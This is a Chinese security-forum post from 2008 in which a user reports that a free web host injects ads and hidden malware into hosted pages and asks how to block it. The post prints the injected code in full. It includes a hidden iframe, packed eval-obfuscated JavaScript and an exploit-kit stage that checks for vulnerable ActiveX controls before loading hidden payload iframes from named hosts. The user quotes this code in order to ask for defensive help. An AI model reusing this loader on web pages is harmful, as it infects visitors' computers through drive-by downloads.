[讨论]免费空间代码屏蔽问题
[讨论]免费空间代码屏蔽问题信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/]www.eviloctal.com[/url])
议题作者:i_lv_lcx
最近发现,很多免费空间都会在你上传的网页中自动插入广告代码,甚至直接在你的网页理挂马
我最近用的[url=http://www.5944.net/]www.5944.net[/url] 就貌似在用我的网页挂马挂流量
如图1
[img]http://forum.eviloctal.com/images/default/attachimg.gif[/img] [img]http://forum.eviloctal.com/attachments/month_0802/20080223_5e2721b549551f5dca51X8YDmIiZ8KyM.jpg[/img] [img]http://forum.eviloctal.com/images/attachicons/image.gif[/img][url=http://forum.eviloctal.com/attachment.php?aid=11025¬humb=yes]未命名1.jpg[/url] (61.67 KB)
图1
2008-2-23 10:38
打开[url=http://086170.service-google.cn/vip/Cn81599.htm]http://086170.service-google.cn/vip/Cn81599.htm[/url] 代码如下
引用:
<iframe src=wm2/index.html width=1 height=1 border=1></iframe>
<script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('b("\\1\\0\\a\\1\\2\\9\\0\\2\\8\\4\\1\\5\\3\\0\\c\\7\\i\\h\\4\\d\\3\\2\\5\\f\\6\\e\\6\\0\\7\\g");',19,19,'x65|x74|x61|x6C|x73|x79|x6E|x27|x20|x72|x78|eval|x3D|x70|x6F|x3A|x3E|x69|x64'.split('|'),0,{}))</script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1554929.js"></script>
再打开代码你引用的[url=http://086170.service-google.cn/vip/wm2/index.html]http://086170.service-google.cn/vip/wm2/index.html[/url]
代码如下:
引用:
<script>
window.onerror=function(){return true;}
window.status="完成";
</script>
<script>
try{if(new ActiveXObject("Mi"+"cro"+"soft.X"+"ML"+"H"+"TT"+"P"))window["document"]["write"]('<iframe style=display:none src="2.gif"></iframe>');}catch(e){};
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('b{a(c d("9"+"\\g\\7\\3\\2\\4\\5\\6"+"f"+"h.1"))o["p"]["q"](\'<0 n=m:i j="8.k"></0>\')}l(e){}',27,27,'iframe||x2E|x6C|x49|x45|x52|x74||IERP|if|try|new|ActiveXObject||PC|x43|tl|none|src|gif|catch|display|style|window|document|write'.split('|'),0,{}));
try{if(new ActiveXObject("M"+"PS.S"+"to"+"rm"+"Pl"+"ay"+"er"))window["document"]["write"]('<iframe style=display:none src="1.gif"></iframe>');}catch(e){};
try{if(new ActiveXObject("P"+"OW"+"ERPLA"+"YE"+"R.Powe"+"rPlay"+"erC"+"trl.1"))window["document"]["write"]('<iframe style=display:none src="5.gif"></iframe>');}catch(e){};
try{if(new ActiveXObject("GLCH"+"AT.GLCh"+"atCtrl.1"))window["document"]["write"]('<iframe style=display:none src="11.gif"></iframe>');}catch(e){};
try{if(new ActiveXObject("Ba"+"id"+"uB"+"ar.To"+"ol"))window["document"]["write"]('<iframe style=display:none src="4.gif"></iframe>');}catch(e){};
</script>
我真是不敢再往下看了..
不知邪八的各位大大有没有什么方法能屏蔽掉类似的代码
帖子9 精华[url=http://forum.eviloctal.com/digest.php?authorid=84854]0[/url] 积分36 阅读权限40 在线时间7 小时
页:
[1]